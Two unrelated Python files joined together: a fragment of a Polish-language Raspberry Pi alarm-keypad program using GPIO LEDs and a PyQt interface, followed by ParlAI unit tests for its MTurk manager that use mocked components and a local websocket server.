GPIO.output(24, GPIO.HIGH) # CZERWONA
GPIO.output(25, GPIO.HIGH) # YELLOW UPPER
GPIO.output(8, GPIO.HIGH) # YELLOW MIDDLE
GPIO.output(7, GPIO.HIGH) # YELLOW BOTTOM
GPIO.output(1, GPIO.HIGH) # GREEN
code = []
txt = ''
else:
GPIO.output(25, GPIO.LOW) # YELLOW UPPER
GPIO.output(8, GPIO.LOW) # YELLOW MIDDLE
GPIO.output(7, GPIO.HIGH) # YELLOW BOTTOM
GPIO.output(1, GPIO.LOW) # GREEN
time.sleep(0.5)
code = []
txt = ''
GPIO.output(25, GPIO.LOW) # YELLOW UPPER
GPIO.output(8, GPIO.HIGH) # YELLOW MIDDLE
GPIO.output(7, GPIO.LOW) # YELLOW BOTTOM
time.sleep(0.5)
GPIO.output(25, GPIO.HIGH) # YELLOW UPPER
GPIO.output(8, GPIO.LOW) # YELLOW MIDDLE
GPIO.output(7, GPIO.LOW) # YELLOW BOTTOM
time.sleep(0.5)
GPIO.output(25, GPIO.LOW) # YELLOW UPPER
clean_label()
def clean_label():
global armed, Alarm, FireAlarm, WaterAlarm
if armed == 1 and FireAlarm == 0 and WaterAlarm == 0 and problem == 0:
window.label.setStyleSheet("color: rgb(255, 0, 0);")
window.label.setText('Alarm uzbrojony')
GPIO.output(24, GPIO.HIGH)
GPIO.output(25, GPIO.LOW) # YELLOW UPPER
GPIO.output(8, GPIO.LOW) # YELLOW MIDDLE
GPIO.output(7, GPIO.LOW) # YELLOW BOTTOM
GPIO.output(1, GPIO.LOW) # GREEN
elif armed == 1 and Alarm == 1:
window.label.setStyleSheet("color: rgb(255, 0, 0);")
window.label.setText('ALARM')
GPIO.output(24, GPIO.HIGH) # CZERWONA
GPIO.output(25, GPIO.HIGH) # YELLOW UPPER
GPIO.output(8, GPIO.HIGH) # YELLOW MIDDLE
GPIO.output(7, GPIO.HIGH) # YELLOW BOTTOM
GPIO.output(1, GPIO.HIGH) # GREEN
elif armed == 0:
window.label.setStyleSheet("color: rgb(0, 255, 0);")
Alarm = 0
window.label.setStyleSheet("color: rgb(0, 255, 0);")
window.label.setText('Alarm rozbrojony')
clear_flags()
GPIO.output(24, GPIO.LOW) # CZERWONA
GPIO.output(25, GPIO.LOW) # YELLOW UPPER
GPIO.output(8, GPIO.LOW) # YELLOW MIDDLE
GPIO.output(7, GPIO.LOW) # YELLOW BOTTOM
GPIO.output(1, GPIO.HIGH) # GREEN
def incorrect_code():
global code, txt, armed
window.label.setText('Kod niepoprawny')
t1 = threading.Thread(target=clean_delay)
t1.start()
def correct_code():
global code, txt, armed
if armed == 1:
code = []
txt = ''
armed = 0
t1 = threading.Thread(target=clean_label)
t1.start()
elif armed == 0:
code = []
txt = ''
t1 = threading.Thread(target=arm_alarm)
t1.start()
class Window(QMainWindow):
def __init__(self):
super().__init__()
self.setWindowTitle("System alarmowy")
self.setGeometry(100, 100, 620, 450)
self.UiComponents()
self.show()
# method for widgets
def UiComponents(self):
self.label = QLabel(self)
self.label.setGeometry(5, 5, 790, 80)
self.label.setWordWrap(True)
self.label.setStyleSheet("border : 2px solid black")
self.label.setAlignment(Qt.AlignCenter)
self.label.setFont(QFont('Arial', 25))
push1 = QPushButton("1", self)
push1.setGeometry(230, 97, 110, 110)
push2 = QPushButton("2", self)
push2.setGeometry(345, 97, 110, 110)
push3 = QPushButton("3", self)
push3.setGeometry(460, 97, 110, 110)
push4 = QPushButton("4", self)
push4.setGeometry(230, 212, 110, 110)
push5 = QPushButton("5", self)
push5.setGeometry(345, 212, 110, 110)
push6 = QPushButton("5", self)
push6.setGeometry(460, 212, 110, 110)
push7 = QPushButton("7", self)
push7.setGeometry(230, 327, 110, 110)
push8 = QPushButton("8", self)
push8.setGeometry(345, 327, 110, 110)
push9 = QPushButton("9", self)
push9.setGeometry(460, 327, 110, 110)
push1.clicked.connect(self.action1)
push2.clicked.connect(self.action2)
push3.clicked.connect(self.action3)
push4.clicked.connect(self.action4)
push5.clicked.connect(self.action5)
push6.clicked.connect(self.action6)
push7.clicked.connect(self.action7)
push8.clicked.connect(self.action8)
push9.clicked.connect(self.action9)
self.showMaximized()
def rfid(self):
global code, txt, armed, Alarm
Alarm = 0
armed = 0
code = []
txt = ''
clean_label()
def action1(self):
global code, txt
code.append(1)
self.label.setStyleSheet("color: rgb(0, 0, 0);")
txt = txt + '*'
if len(code) == 4:
if (code == password):
correct_code()
else:
incorrect_code()
else:
self.label.setText(txt)
def action2(self):
global code, txt
code.append(2)
self.label.setStyleSheet("color: rgb(0, 0, 0);")
txt = txt + '*'
if len(code) == 4:
if (code == password):
correct_code()
else:
incorrect_code()
else:
self.label.setText(txt)
def action3(self):
global code, txt
code.append(3)
self.label.setStyleSheet("color: rgb(0, 0, 0);")
txt = txt + '*'
if len(code) == 4:
if (code == password):
correct_code()
else:
incorrect_code()
else:
self.label.setText(txt)
def action4(self):
global code, txt
code.append(4)
self.label.setStyleSheet("color: rgb(0, 0, 0);")
txt = txt + '*'
if len(code) == 4:
if (code == password):
correct_code()
else:
incorrect_code()
else:
self.label.setText(txt)
def action5(self):
global code, txt
code.append(5)
self.label.setStyleSheet("color: rgb(0, 0, 0);")
txt = txt + '*'
if len(code) == 4:
if (code == password):
correct_code()
else:
incorrect_code()
else:
self.label.setText(txt)
def action6(self):
global code, txt
code.append(6)
self.label.setStyleSheet("color: rgb(0, 0, 0);")
txt = txt + '*'
if len(code) == 4:
if (code == password):
correct_code()
else:
incorrect_code()
else:
self.label.setText(txt)
def action7(self):
global code, txt
code.append(7)
self.label.setStyleSheet("color: rgb(0, 0, 0);")
txt = txt + '*'
if len(code) == 4:
if (code == password):
correct_code()
else:
incorrect_code()
else:
self.label.setText(txt)
def action8(self):
global code, txt
code.append(8)
self.label.setStyleSheet("color: rgb(0, 0, 0);")
txt = txt + '*'
if len(code) == 4:
if (code == password):
correct_code()
else:
incorrect_code()
else:
self.label.setText(txt)
def action9(self):
global code, txt
code.append(9)
self.label.setStyleSheet("color: rgb(0, 0, 0);")
txt = txt + '*'
if len(code) == 4:
if (code == password):
correct_code()
else:
incorrect_code()
else:
self.label.setText(txt)
App = QApplication(sys.argv)
window = Window()
window.label.setStyleSheet("color: rgb(0, 255, 0);")
window.label.setText('Alarm rozbrojony')
clear_flags()
GPIO.output(1, GPIO.HIGH) # GREEN
thread = AThread()
thread.finished.connect(App.exit)
thread.start()
sys.exit(App.exec())
# client.loop_stop() #stop the loop
except:
print("Clean Program Exit")
finally:
GPIO.cleanup() # this ensures a clean exit
|
test_mturk_manager.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import unittest
import os
import time
import json
import threading
import pickle
from unittest import mock
from parlai.mturk.core.worker_manager import WorkerManager
from parlai.mturk.core.agents import MTurkAgent
from parlai.mturk.core.shared_utils import AssignState
from parlai.mturk.core.mturk_manager import MTurkManager
from parlai.mturk.core.socket_manager import SocketManager, Packet
from parlai.core.params import ParlaiParser
from websocket_server import WebsocketServer
import parlai.mturk.core.mturk_manager as MTurkManagerFile
import parlai.mturk.core.data_model as data_model
import parlai.utils.testing as testing_utils
parent_dir = os.path.dirname(os.path.abspath(__file__))
MTurkManagerFile.parent_dir = os.path.dirname(os.path.abspath(__file__))
MTurkManagerFile.mturk_utils = mock.MagicMock()
# Lets ignore the logging part
MTurkManagerFile.shared_utils.print_and_log = mock.MagicMock()
TEST_WORKER_ID_1 = 'TEST_WORKER_ID_1'
TEST_WORKER_ID_2 = 'TEST_WORKER_ID_2'
TEST_WORKER_ID_3 = 'TEST_WORKER_ID_3'
TEST_ASSIGNMENT_ID_1 = 'TEST_ASSIGNMENT_ID_1'
TEST_ASSIGNMENT_ID_2 = 'TEST_ASSIGNMENT_ID_2'
TEST_ASSIGNMENT_ID_3 = 'TEST_ASSIGNMENT_ID_3'
TEST_HIT_ID_1 = 'TEST_HIT_ID_1'
TEST_HIT_ID_2 = 'TEST_HIT_ID_2'
TEST_HIT_ID_3 = 'TEST_HIT_ID_3'
FAKE_ID = 'BOGUS'
def assert_equal_by(val_func, val, max_time):
start_time = time.time()
while val_func() != val:
assert (
time.time() - start_time < max_time
), "Value was not attained in specified time"
time.sleep(0.1)
class MockSocket:
def __init__(self):
self.last_messages = {}
self.connected = False
self.disconnected = False
self.closed = False
self.ws = None
self.should_heartbeat = True
self.fake_workers = []
self.port = None
self.launch_socket()
self.handlers = {}
while self.ws is None:
time.sleep(0.05)
time.sleep(1)
def send(self, packet):
self.ws.send_message_to_all(packet)
def close(self):
if not self.closed:
self.ws.server_close()
self.ws.shutdown()
self.closed = True
def do_nothing(self, *args):
pass
def launch_socket(self):
def on_message(client, server, message):
if self.closed:
raise Exception('Socket is already closed...')
if message == '':
return
packet_dict = json.loads(message)
if packet_dict['content']['id'] == 'WORLD_ALIVE':
self.ws.send_message(client, json.dumps({'type': 'conn_success'}))
self.connected = True
elif packet_dict['content']['type'] == 'heartbeat':
pong = packet_dict['content'].copy()
pong['type'] = 'pong'
self.ws.send_message(
client,
json.dumps(
{'type': data_model.SOCKET_ROUTE_PACKET_STRING, 'content': pong}
),
)
if 'receiver_id' in packet_dict['content']:
receiver_id = packet_dict['content']['receiver_id']
use_func = self.handlers.get(receiver_id, self.do_nothing)
use_func(packet_dict['content'])
def on_connect(client, server):
pass
def on_disconnect(client, server):
self.disconnected = True
def run_socket(*args):
port = 3030
while self.port is None:
try:
self.ws = WebsocketServer(port, host='127.0.0.1')
self.port = port
except OSError:
port += 1
self.ws.set_fn_client_left(on_disconnect)
self.ws.set_fn_new_client(on_connect)
self.ws.set_fn_message_received(on_message)
self.ws.run_forever()
self.listen_thread = threading.Thread(
target=run_socket, name='Fake-Socket-Thread'
)
self.listen_thread.daemon = True
self.listen_thread.start()
class InitTestMTurkManager(unittest.TestCase):
"""
Unit tests for MTurkManager setup.
"""
def setUp(self):
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args([], print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
def tearDown(self):
self.mturk_manager.shutdown()
def test_init(self):
manager = self.mturk_manager
opt = self.opt
self.assertIsNone(manager.server_url)
self.assertIsNone(manager.topic_arn)
self.assertIsNone(manager.server_task_name)
self.assertIsNone(manager.task_group_id)
self.assertIsNone(manager.run_id)
self.assertIsNone(manager.task_files_to_copy)
self.assertIsNone(manager.onboard_function)
self.assertIsNone(manager.socket_manager)
self.assertFalse(manager.is_shutdown)
self.assertFalse(manager.is_unique)
self.assertEqual(manager.opt, opt)
self.assertEqual(manager.mturk_agent_ids, self.mturk_agent_ids)
self.assertEqual(manager.is_sandbox, opt['is_sandbox'])
self.assertEqual(manager.num_conversations, opt['num_conversations'])
self.assertEqual(manager.is_sandbox, opt['is_sandbox'])
self.assertGreaterEqual(
manager.required_hits, manager.num_conversations * len(self.mturk_agent_ids)
)
self.assertIsNotNone(manager.agent_pool_change_condition)
self.assertEqual(manager.minimum_messages, opt.get('min_messages', 0))
self.assertEqual(
manager.auto_approve_delay, opt.get('auto_approve_delay', 5 * 24 * 3600)
)
self.assertEqual(manager.has_time_limit, opt.get('max_time', 0) > 0)
self.assertIsInstance(manager.worker_manager, WorkerManager)
self.assertEqual(manager.task_state, manager.STATE_CREATED)
def test_init_state(self):
manager = self.mturk_manager
manager._init_state()
self.assertEqual(manager.agent_pool, [])
self.assertEqual(manager.hit_id_list, [])
self.assertEqual(manager.conversation_index, 0)
self.assertEqual(manager.started_conversations, 0)
self.assertEqual(manager.completed_conversations, 0)
self.assertEqual(manager.task_threads, [])
self.assertTrue(manager.accepting_workers, True)
self.assertIsNone(manager.qualifications)
self.assertGreater(manager.time_limit_checked, time.time() - 1)
self.assertEqual(manager.task_state, manager.STATE_INIT_RUN)
class TestMTurkManagerUnitFunctions(unittest.TestCase):
"""
Tests some of the simpler MTurkManager functions that don't require much additional
state to run.
"""
def setUp(self):
self.fake_socket = MockSocket()
time.sleep(0.1)
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args([], print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
self.mturk_manager._init_state()
self.mturk_manager.port = self.fake_socket.port
self.agent_1 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_1,
TEST_ASSIGNMENT_ID_1,
TEST_WORKER_ID_1,
)
self.agent_2 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_2,
TEST_ASSIGNMENT_ID_2,
TEST_WORKER_ID_2,
)
self.agent_3 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_3,
TEST_ASSIGNMENT_ID_3,
TEST_WORKER_ID_3,
)
def tearDown(self):
self.mturk_manager.shutdown()
self.fake_socket.close()
def test_move_to_waiting(self):
manager = self.mturk_manager
manager.worker_manager.change_agent_conversation = mock.MagicMock()
manager.socket_manager = mock.MagicMock()
manager.socket_manager.close_channel = mock.MagicMock()
manager.force_expire_hit = mock.MagicMock()
self.agent_1.set_status(AssignState.STATUS_DISCONNECT)
self.agent_1.reduce_state = mock.MagicMock()
self.agent_2.reduce_state = mock.MagicMock()
self.agent_3.reduce_state = mock.MagicMock()
# Test with a disconnected agent, assert the channel is closed
manager._move_agents_to_waiting([self.agent_1])
self.agent_1.reduce_state.assert_called_once()
manager.socket_manager.close_channel.assert_called_once_with(
self.agent_1.get_connection_id()
)
manager.worker_manager.change_agent_conversation.assert_not_called()
manager.force_expire_hit.assert_not_called()
manager.socket_manager.close_channel.reset_mock()
# Test with a connected agent, should be moved to waiting
manager._move_agents_to_waiting([self.agent_2])
self.agent_2.reduce_state.assert_not_called()
manager.socket_manager.close_channel.assert_not_called()
manager.worker_manager.change_agent_conversation.assert_called_once()
args = manager.worker_manager.change_agent_conversation.call_args[1]
self.assertEqual(args['agent'], self.agent_2)
self.assertTrue(manager.is_waiting_world(args['conversation_id']))
self.assertEqual(args['new_agent_id'], 'waiting')
manager.force_expire_hit.assert_not_called()
manager.worker_manager.change_agent_conversation.reset_mock()
# Test when no longer accepting agents
manager.accepting_workers = False
manager._move_agents_to_waiting([self.agent_3])
self.agent_3.reduce_state.assert_not_called()
manager.socket_manager.close_channel.assert_not_called()
manager.worker_manager.change_agent_conversation.assert_not_called()
manager.force_expire_hit.assert_called_once_with(
self.agent_3.worker_id, self.agent_3.assignment_id
)
def test_socket_setup(self):
"""
Basic socket setup should fail when not in correct state, but succeed otherwise.
"""
self.mturk_manager.task_state = self.mturk_manager.STATE_CREATED
with self.assertRaises(AssertionError):
self.mturk_manager._setup_socket()
self.mturk_manager.task_group_id = 'TEST_GROUP_ID'
self.mturk_manager.server_url = 'https://127.0.0.1'
self.mturk_manager.task_state = self.mturk_manager.STATE_INIT_RUN
self.mturk_manager._setup_socket()
self.assertIsInstance(self.mturk_manager.socket_manager, SocketManager)
def test_worker_alive(self):
# Setup for test
manager = self.mturk_manager
manager.task_group_id = 'TEST_GROUP_ID'
manager.server_url = 'https://127.0.0.1'
manager.task_state = manager.STATE_ACCEPTING_WORKERS
manager._setup_socket()
manager.force_expire_hit = mock.MagicMock()
manager._onboard_new_agent = mock.MagicMock()
manager.socket_manager.open_channel = mock.MagicMock(
wraps=manager.socket_manager.open_channel
)
manager.worker_manager.worker_alive = mock.MagicMock(
wraps=manager.worker_manager.worker_alive
)
open_channel = manager.socket_manager.open_channel
worker_alive = manager.worker_manager.worker_alive
# Test no assignment
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': None,
'conversation_id': None,
},
'',
)
manager._on_alive(alive_packet)
open_channel.assert_not_called()
worker_alive.assert_not_called()
manager._onboard_new_agent.assert_not_called()
# Test not accepting workers
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': None,
},
'',
)
manager.accepting_workers = False
manager._on_alive(alive_packet)
open_channel.assert_called_once_with(TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1)
worker_alive.assert_called_once_with(TEST_WORKER_ID_1)
worker_state = manager.worker_manager._get_worker(TEST_WORKER_ID_1)
self.assertIsNotNone(worker_state)
open_channel.reset_mock()
worker_alive.reset_mock()
manager.force_expire_hit.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
manager._onboard_new_agent.assert_not_called()
manager.force_expire_hit.reset_mock()
# Test successful creation
manager.accepting_workers = True
manager._on_alive(alive_packet)
open_channel.assert_called_once_with(TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1)
worker_alive.assert_called_once_with(TEST_WORKER_ID_1)
manager._onboard_new_agent.assert_called_once()
manager._onboard_new_agent.reset_mock()
manager.force_expire_hit.assert_not_called()
agent = manager.worker_manager.get_agent_for_assignment(TEST_ASSIGNMENT_ID_1)
self.assertIsInstance(agent, MTurkAgent)
self.assertEqual(agent.get_status(), AssignState.STATUS_NONE)
# Reconnect in various conditions
agent.set_status = mock.MagicMock(wraps=agent.set_status)
manager._add_agent_to_pool = mock.MagicMock()
# Reconnect when none state no connection_id
agent.log_reconnect = mock.MagicMock(wraps=agent.log_reconnect)
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
manager.force_expire_hit.reset_mock()
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_not_called()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in None state onboarding conversation_id
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': 'o_1234',
},
'',
)
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
agent.set_status.assert_called_once_with(AssignState.STATUS_ONBOARDING)
manager._add_agent_to_pool.assert_not_called()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in None state waiting conversation_id
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': 'w_1234',
},
'',
)
agent.set_status(AssignState.STATUS_NONE)
agent.set_status.reset_mock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
agent.set_status.assert_called_once_with(AssignState.STATUS_WAITING)
manager._add_agent_to_pool.assert_called_once_with(agent)
manager._add_agent_to_pool.reset_mock()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in onboarding with waiting conversation id
agent.set_status(AssignState.STATUS_ONBOARDING)
agent.set_status.reset_mock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
agent.set_status.assert_called_once_with(AssignState.STATUS_WAITING)
manager._add_agent_to_pool.assert_called_once_with(agent)
manager._add_agent_to_pool.reset_mock()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in onboarding with no conversation id
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': None,
},
'',
)
agent.set_status(AssignState.STATUS_ONBOARDING)
agent.set_status.reset_mock()
manager._restore_agent_state = mock.MagicMock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
manager._restore_agent_state.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_not_called()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in onboarding but not accepting new workers
manager.accepting_workers = False
agent.set_status(AssignState.STATUS_ONBOARDING)
agent.set_status.reset_mock()
manager._restore_agent_state = mock.MagicMock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
manager.force_expire_hit.reset_mock()
manager._restore_agent_state.assert_not_called()
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_not_called()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in waiting no conv id
manager.accepting_workers = True
agent.set_status(AssignState.STATUS_WAITING)
agent.set_status.reset_mock()
manager._restore_agent_state = mock.MagicMock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
manager._restore_agent_state.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_called_once()
manager._add_agent_to_pool.reset_mock()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in waiting with conv id
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': 'w_1234',
},
'',
)
agent.set_status(AssignState.STATUS_WAITING)
agent.set_status.reset_mock()
manager._restore_agent_state = mock.MagicMock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
manager._restore_agent_state.assert_not_called()
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_called_once()
manager._add_agent_to_pool.reset_mock()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in waiting with task id
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': 't_1234',
},
'',
)
agent.set_status(AssignState.STATUS_WAITING)
agent.set_status.reset_mock()
manager._restore_agent_state = mock.MagicMock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
manager._restore_agent_state.assert_not_called()
agent.set_status.assert_called_with(AssignState.STATUS_IN_TASK)
manager._add_agent_to_pool.assert_not_called()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Test active convos failure
agent.set_status(AssignState.STATUS_IN_TASK)
agent.set_status.reset_mock()
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_2,
'conversation_id': None,
},
'',
)
manager.opt['allowed_conversations'] = 1
manager._on_alive(alive_packet)
agent.set_status.assert_not_called()
manager.force_expire_hit.assert_called_once()
manager._onboard_new_agent.assert_not_called()
manager.force_expire_hit.reset_mock()
# Test uniqueness failed
agent.set_status(AssignState.STATUS_DONE)
agent.set_status.reset_mock()
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_2,
'conversation_id': None,
},
'',
)
manager.is_unique = True
manager._on_alive(alive_packet)
agent.set_status.assert_not_called()
manager.force_expire_hit.assert_called_once()
manager._onboard_new_agent.assert_not_called()
manager.force_expire_hit.reset_mock()
# Test in task reconnects
agent.set_status(AssignState.STATUS_IN_TASK)
agent.set_status.reset_mock()
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': None,
},
'',
)
manager._on_alive(alive_packet)
manager._restore_agent_state.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_not_called()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Test all final states
for use_state in [
AssignState.STATUS_DISCONNECT,
AssignState.STATUS_DONE,
AssignState.STATUS_EXPIRED,
AssignState.STATUS_RETURNED,
AssignState.STATUS_PARTNER_DISCONNECT,
]:
manager.send_command = mock.MagicMock()
agent.set_status(use_state)
agent.set_status.reset_mock()
manager._on_alive(alive_packet)
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_not_called()
manager.force_expire_hit.assert_not_called()
manager.send_command.assert_called_once()
def test_mturk_messages(self):
"""
Ensure incoming messages work as expected.
"""
# Setup for test
manager = self.mturk_manager
manager.task_group_id = 'TEST_GROUP_ID'
manager.server_url = 'https://127.0.0.1'
manager.task_state = manager.STATE_ACCEPTING_WORKERS
manager._setup_socket()
manager.force_expire_hit = mock.MagicMock()
manager._on_socket_dead = mock.MagicMock()
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': None,
},
'',
)
manager._on_alive(alive_packet)
agent = manager.worker_manager.get_agent_for_assignment(TEST_ASSIGNMENT_ID_1)
self.assertIsInstance(agent, MTurkAgent)
self.assertEqual(agent.get_status(), AssignState.STATUS_NONE)
agent.set_hit_is_abandoned = mock.MagicMock()
# Test SNS_ASSIGN_ABANDONDED
message_packet = Packet(
'',
'',
'',
'',
TEST_ASSIGNMENT_ID_1,
{'text': MTurkManagerFile.SNS_ASSIGN_ABANDONDED},
'',
)
manager._handle_mturk_message(message_packet)
agent.set_hit_is_abandoned.assert_called_once()
agent.set_hit_is_abandoned.reset_mock()
manager._on_socket_dead.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
manager._on_socket_dead.reset_mock()
# Test SNS_ASSIGN_RETURNED
message_packet = Packet(
'',
'',
'',
'',
TEST_ASSIGNMENT_ID_1,
{'text': MTurkManagerFile.SNS_ASSIGN_RETURNED},
'',
)
agent.hit_is_returned = False
manager._handle_mturk_message(message_packet)
manager._on_socket_dead.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
manager._on_socket_dead.reset_mock()
self.assertTrue(agent.hit_is_returned)
# Test SNS_ASSIGN_SUBMITTED
message_packet = Packet(
'',
'',
'',
'',
TEST_ASSIGNMENT_ID_1,
{'text': MTurkManagerFile.SNS_ASSIGN_SUBMITTED},
'',
)
agent.hit_is_complete = False
manager._handle_mturk_message(message_packet)
manager._on_socket_dead.assert_not_called()
self.assertTrue(agent.hit_is_complete)
def test_new_message(self):
"""
test on_new_message.
"""
alive_packet = Packet(
'',
TEST_WORKER_ID_1,
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': None,
},
'',
)
message_packet = Packet(
'',
'',
MTurkManagerFile.AMAZON_SNS_NAME,
'',
TEST_ASSIGNMENT_ID_1,
{'text': MTurkManagerFile.SNS_ASSIGN_SUBMITTED},
'',
)
manager = self.mturk_manager
manager._handle_mturk_message = mock.MagicMock()
manager.worker_manager.route_packet = mock.MagicMock()
# test mturk message
manager._on_new_message(alive_packet)
manager._handle_mturk_message.assert_not_called()
manager.worker_manager.route_packet.assert_called_once_with(alive_packet)
manager.worker_manager.route_packet.reset_mock()
# test non-mturk message
manager._on_new_message(message_packet)
manager._handle_mturk_message.assert_called_once_with(message_packet)
manager.worker_manager.route_packet.assert_not_called()
@testing_utils.retry()
def test_onboarding_function(self):
manager = self.mturk_manager
manager.onboard_function = mock.MagicMock()
manager.worker_manager.change_agent_conversation = mock.MagicMock()
manager._move_agents_to_waiting = mock.MagicMock()
manager.worker_manager.get_agent_for_assignment = mock.MagicMock(
return_value=self.agent_1
)
onboard_threads = manager.assignment_to_onboard_thread
did_launch = manager._onboard_new_agent(self.agent_1)
assert_equal_by(onboard_threads[self.agent_1.assignment_id].isAlive, True, 0.2)
time.sleep(0.1)
manager.worker_manager.change_agent_conversation.assert_called_once()
manager.worker_manager.change_agent_conversation.reset_mock()
manager.onboard_function.assert_not_called()
self.assertTrue(did_launch)
# Thread will be waiting for agent_1 status to go to ONBOARDING, ensure
# won't start new thread on a repeat call when first still alive
did_launch = manager._onboard_new_agent(self.agent_1)
time.sleep(0.2)
manager.worker_manager.change_agent_conversation.assert_not_called()
manager.worker_manager.get_agent_for_assignment.assert_not_called()
manager.onboard_function.assert_not_called()
self.assertFalse(did_launch)
# Advance the worker to simulate a connection, assert onboarding goes
self.agent_1.set_status(AssignState.STATUS_ONBOARDING)
assert_equal_by(onboard_threads[self.agent_1.assignment_id].isAlive, False, 0.6)
manager.onboard_function.assert_called_with(self.agent_1)
manager._move_agents_to_waiting.assert_called_once()
# Try to launch a new onboarding world for the same agent still in
# onboarding, assert that this call is ignored.
did_launch = manager._onboard_new_agent(self.agent_1)
self.assertFalse(did_launch)
# Try to launch with an agent that was in none but supposedly launched
# before
self.agent_1.set_status(AssignState.STATUS_NONE)
did_launch = manager._onboard_new_agent(self.agent_1)
self.assertTrue(did_launch)
self.agent_1.set_status(AssignState.STATUS_ONBOARDING)
def test_agents_incomplete(self):
agents = [self.agent_1, self.agent_2, self.agent_3]
manager = self.mturk_manager
